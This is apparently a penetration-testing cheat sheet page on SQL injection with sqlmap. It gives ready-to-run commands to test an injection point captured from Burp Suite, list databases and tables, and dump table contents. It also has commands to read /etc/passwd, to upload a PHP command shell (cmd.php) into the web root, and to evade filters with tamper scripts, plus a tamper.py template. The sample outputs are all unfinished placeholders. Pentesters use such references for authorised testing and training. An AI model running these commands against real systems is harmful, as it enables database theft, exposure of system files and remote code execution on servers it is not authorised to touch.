TLDRBins TLDRBins / SQL Injection

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

sqlmap

# In Burp Suite, we can right click the request and click `copy to file` to save the request
# And add `*` to request to indicate the sql injection point

Sample Output:
TO-DO

# Initial testing HTTP
sqlmap -r request --batch --banner --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10

Sample Output:
TO-DO
# Initial testing HTTPS
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --force-ssl

Sample Output:
TO-DO
# Add a string to indicate injection succeed (e.g. Invalid User vs Error Occurred)
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --string 'Invalid User'

Sample Output:
TO-DO
# Get databases
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --dbs

Sample Output:
TO-DO
# Get tables
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --tables

Sample Output:
TO-DO
# Dump table
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> -T <TABLE_NAME> --dump

Sample Output:
TO-DO
# Dump all tables (slow)
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --dump

Sample Output:
TO-DO
# Specify technique
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --technique U

Sample Output:
TO-DO

Technique

+------------------------+
| B: Boolean-based blind |
| E: Error-based         |
| U: Union query-based   |
| S: Stacked queries     |
| T: Time-based blind    |
| Q: Inline queries      |
+------------------------+

Sample Output:
TO-DO

Advance sqlmap

# File write
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-write ./cmd.php --file-dest /var/www/html/cmd.php

Sample Output:
TO-DO
# Add payload tamper script, e.g. randomcase
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --tamper randomcase

Sample Output:
TO-DO
# Check privileges
sqlmap -r request --privileges

Sample Output:
TO-DO
# Read a file
sqlmap -r request --file-read=/etc/passwd

Sample Output:
TO-DO
# Write a file
sqlmap -r request --file-write=./test.txt --file-dest=/tmp/test.txt

Sample Output:
TO-DO

tamper.py template

#!/usr/bin/env python3

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    return payload

Sample Output:
TO-DO

Note: create an empty __init__.py in the same folder